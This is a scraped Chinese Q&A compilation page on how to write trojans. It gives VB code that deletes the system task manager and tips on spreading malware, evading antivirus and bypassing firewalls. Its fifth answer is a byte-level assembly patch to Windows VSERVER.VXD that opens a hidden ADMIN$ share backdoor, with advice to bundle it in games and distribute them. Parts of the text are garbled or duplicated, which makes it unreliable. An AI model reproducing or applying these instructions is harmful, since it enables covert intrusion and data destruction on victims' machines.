锐客网

  1. 首页 > 生活百科 > >

木马程序怎么编写,木马是如何编写的

经验分享生活百科

1,木马是如何编写的至于如何编写木马 , 当然需要写程序 。编程语言的种类不少,编写木马最常用的语言有C++、VB和汇编 。我举个简单的例子,在VB里编写一个病毒:Private Sub form_Load()me.hide()kill environ("windir") + "\system32\" + "taskrgm.exe"unlaod meend sub试试在VB内运行这段代码,这样就可以把系统的任务管理器删除了!病毒危害人 , 阻碍计算机网络秩序……
2,如何编程木马呀别小看 那几K东西哟 , 或许你就会爱上他!想编写木马,你可以多掌握宏观的计算机知识,比如木马有多少方法传送!用什么手段在传播!用什么方法来回避杀毒软件!用什么方法监控你的计算机!用什么方法运行还不会让你感觉机器卡!编写很容易 ! 想作个NO1的木马 不是那么容易的!熊猫烧香这个病毒是借用蠕虫病毒的变种,加上自己的程序而成的!变异:也就是这么产生的 , 电脑病毒不会想生物体病毒那么样自己来变异,而是认为的来变异! 自己首先要懂得一门编程技术 。借鉴前人的源代码 。或者自己编写
3,怎么编写木马程序木马(木马于病毒不同,木马处于后门盗取 已经远程已经成为主流)病毒病毒也就是单纯的破坏计算机 ---------------------------------您提到要编写木马程序我们从以下几点说明1:端口2:服务器 (FTP , web,当然是用了收文件而用 可以选择 邮箱 或者是一个电脑磁盘 因为新手对于这种木马来说并不需要几千几万台电脑来使用 普通台式机配置足矣 )3:绕防火墙 4:自身的复制能力5:自身的隐藏于触发因数------------------------其实想要编写不管是病毒啊木马啊 蠕虫啊都需要一个对电脑软体认识度比较高的水平----------推荐学习汉语编程(易语言)简单这个不能回答你 这个啊要看你有没有那个有没有上进心 。一般都是有易语言编写的 。去百度看看把 。做木马很简单的 。从最基础的C语言学起首先你得有台电脑,然后 编啊编啊就出来了【木马程序怎么编写,木马是如何编写的】
4 , 怎么做木马编程学汇编吧,在《黑客X档案》里有对于免杀的介绍自己去看看 。做出来了,不要去毒害他人?。皇墙魑笛椴钒?。呵呵不推荐用c++ 管理内存方面不是那么容易`其实木马也不是那么神秘的1楼的答案是复制的吧 鄙视下一楼所提到了熊猫烧香 这个病毒是采用Delphi写的 作用1楼已经大体说了做病毒首要的就是会一门编程 推荐C++和Delphi1楼还说到了免杀 躲避杀毒软件最好的就是学汇编 修改特征码 和 伪装楼主要认真学习哦问问的编程群是 50167302老大 , 你也太毒了吧,做木马 , 别小看 那几K东西哟,或许你就会爱上他!想编写木马,你可以多掌握宏观的计算机知识 , 比如木马有多少方法传送!用什么手段在传播!用什么方法来回避杀毒软件!用什么方法监控你的计算机!用什么方法运行还不会让你感觉机器卡!编写很容易 ! 想作个NO1的木马 不是那么容易的!熊猫烧香这个病毒是借用蠕虫病毒的变种,加上自己的程序而成的!变异:也就是这么产生的,电脑病毒不会想生物体病毒那么样自己来变异,而是认为的来变异!5,怎么编写木马教你做木马网上木马程序很流行,其实说来也很简单,大致都是修改注册表或者INI文件加载一个文件提供服务,这就手工都很容易检测出木马来 。一,看增加的不明服务 。二,因为木马是作为服务一般要打开一个网络通信端口,所以检查增加的服务端口也很容易检查出木马程序来 。其实完全可以稍微改动操作系统内核而作出一个很好的木马来,这样不用改动注册表也可以让用户很不容易发觉 。下面就是简单改动一个驱动程序做一个木马的方法 。大家可以分析别的驱动程序相应的作出自己的木马来 。这儿是利用WINDOWS的共享和远程管理 。WINDOWS的共享如果共享名是ADMIN$就可以远程管理,就是登陆ADMIN$进去了后所有的盘都完全共享为盘符加$.下面一段就是VSERVER 。VXD处理共享的一段程序,SUB_0027校验密码,密码对了后后面检测共享名是ADMIN $否,是就看C$,D$...共享没有(DATA_0431==0?),没共享就调用SUB_0230共享,SUB_0230 一个参数就是密码指针,如果密码指针为0就没密码 。这儿为了好改动就用的这个参数 。显然我们就可以必要的时候调用SUB_0230 就开了个后门 。LOC_0415是检测网络通信的共享名串大于0DH否(包括串后的0),是就转LOC_0419出错返回,显然我们可以利用这儿去调用SUB_0230. 看LOC_0419 有7个字节可以利用,可以安排 CALL SUB_0230 NEW_LOC_0418 POP eaxjmp 03469 刚好7个字节 。3436: JE LOC_0418 是没找到要共享的目录跳转到LOC_0418 显然要改动,改动成JE NEW_LOC_0418 就可以 。现在是LOC_0415一段要跳转到LOC_0419前要PUSH 0以调用SUB_0230 。下面是LOC_0415的改法:LOC_0415:03415 XOR EAX,EAX ;2 字节,同样SUB AL,AL 得到AL=0;还得到EAX=0 。03417 PUSH EAX ;1 字节 调用SUB_0230 用的DWORD参数 0; 03418 XOR ECX,ECX ;2 字节 ECX=0; 0341A DEC ECX ;1 字节 得到ECX=0FFFFFFFFH这儿与MOV ECX,0FFFFH一样但字节数少 0341B mov edi,ebx ;2 bytes 0341D repne scasb ;2 bytes0341F SUB EDI,EBX ;2 bytes get the share name long 03421 CMP EDI, 0Dh ;3 bytes大于等于0DH跳转 。这儿条件可以改动为等于多少跳转等 。03424 ja short loc_0419 ; 2 byte03426 POP EAX ;1 byte 堆栈平衡03427 PUSH EDI ;1 byte 03428 POP EAX ;1 byte EAX=EDI SHARE NAME LONG , 后面要用刚好字节够用,注意DATA_0182 那儿有重定位那种字节不能简单改动 。你可以把你的好的程序好的游戏加上一小段代码这么改动他的VSERVER 。VXD文件,最好是硬盘的WINDOWS安装目录打包文件里面的VSERVER 。VXD也改动,还有访问共享目录\\IP的139端口也最好加一个别的端口以逃避有些路由器防火墙的设置,再把你的程序散发 。。。。。中了你的木马的你访问他的共享目录后面加一大串字母(共享名串长大于等于0DH)会提示出错,但你就可以再访问\\IP\C$, \\IP\D$....了,这可是完全共享的了.如果你先没有那个一大串字母的访问他也没有设置远程管理的话 \\IP\C$,\\IP\D$... 都不能访问的,他自己用网络监视器也看不到这种共享的,所以很不容易觉察的 。注意你进入共享目录了网络监视器还是能看到 。新华书店有

    推荐阅读


    上一篇:在手机上怎么开发软件,手机软件怎么制作

    下一篇:iPhone文字编辑,苹果11怎么在照片上编辑文字